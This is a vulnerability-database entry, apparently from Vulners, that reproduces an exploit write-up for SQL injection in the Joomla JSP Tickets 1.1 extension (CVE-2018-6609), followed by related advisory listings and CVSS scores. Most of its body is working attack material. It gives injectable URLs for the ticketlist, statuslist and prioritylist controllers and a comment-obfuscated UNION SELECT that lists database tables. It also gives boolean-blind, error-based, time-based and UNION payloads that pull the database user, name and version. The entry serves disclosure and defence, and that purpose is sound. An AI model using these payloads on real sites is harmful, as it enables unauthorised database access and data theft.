Joomla! Component JSP Tickets 1.1 - SQL Injection

🗓️ 05 Feb 2018 00:00:00Reported by Ihsan SencanType

Joomla! Component JSP Tickets 1.1 - SQL Injection vulnerability allows attacker to inject sql commands. Exploit available for version 1.1

Reporter	Title	Published	Views	Family All 10
0day.today	Joomla JSP Tickets 1.1 Component - SQL Injection Vulnerability	6 Feb 201800:00	–	zdt
CNVD	JSP Tickets SQL Injection Vulnerability in Joomla!	6 Feb 201800:00	–	cnvd
CVE	CVE-2018-6609	5 Feb 201822:00	–	cve
Cvelist	CVE-2018-6609	5 Feb 201822:00	–	cvelist
EUVD	EUVD-2018-18356	7 Oct 202500:30	–	euvd
exploitpack	Joomla! Component JSP Tickets 1.1 - SQL Injection	5 Feb 201800:00	–	exploitpack
Joomla! Vulnerable Extensions List	JSP Tickets, 1.1, SQL Injection	22 Feb 201800:00	–	joomla
NVD	CVE-2018-6609	5 Feb 201822:29	–	nvd
Packet Storm	Joomla! JSP Tickets 1.1 SQL Injection	6 Feb 201800:00	–	packetstorm
Prion	Sql injection	5 Feb 201822:29	–	prion

# # # # # 
# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6609
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ? 
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
# 
# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
# 
# Parameter: ticketcode (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
# 
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
# 
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 29 columns
#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG

# 2)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
# 
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
# 
# Parameter: id (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
# 
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
# 
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
# Parameter: id (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
# 
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 OR time-based blind
#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
# 
# 4)
# 
# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
# <input type="text" name="jform[guestemail]"...
# <input type="text" name="jform[ticketid]"... 
# <input type="submit" name="searchsubmit"...
# </form>
# 
# # # # #

05 Feb 2018 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 27.5

CVSS 39.8

EPSS0.02589